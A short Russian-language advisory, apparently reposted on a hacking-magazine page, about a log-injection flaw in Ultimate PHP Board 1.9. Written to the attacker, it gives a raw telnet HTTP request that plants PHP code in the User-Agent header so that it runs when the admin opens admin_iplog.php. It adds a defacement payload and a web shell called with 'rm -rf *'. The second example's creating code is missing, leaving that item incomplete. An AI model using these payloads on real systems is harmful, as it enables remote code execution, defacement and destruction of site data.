Хакер #305. Многошаговые SQL-инъекции
Уязвимость обнаружена в Ultimate PHP Board (UPB). Удаленный пользователь может выполнить произвольный PHP код на системе как UPB администратор.
F0KP сообщает, что в этом форуме присутствует серьезная уязвимость, которая
позволяет атакующему выполнять произвольный php код. UPB протоколирует некоторую информацию о посетителях [такую как REMOTE_ADDR и HTTP_USER_AGENT ] в текстовый файл в директории `db', который называется `iplog'.
Затем в панели администратора, администратор форума может вызвать admin_iplog.php, который просто подключает `iplog'. Например:
e@some_host$ telnet hostname 80
Connected to hostname at 80
GET /board/index.php HTTP/1.0
User-Agent: <? phpinfo(); ?>
когда администратор вызовет admin_iplog.php, ваш код php будет выполнен.
Пример:
1. <? system( "echo \'hacked\' > ../index.html" ); ?>
дефейсит главную страницу форума.
2. создаст tcsh.php с правами httpd в корневой директории веб-сайта. затем вам просто нужно будет зайти на http://hostname/tcsh.php?cmd=rm -rf *
после внедрения кода через поле User-Agent вам нужно подождать пока администратор посмотрит admin_iplog.php.
Уязвимость обнаружена в Ultimate PHP Board 1.9.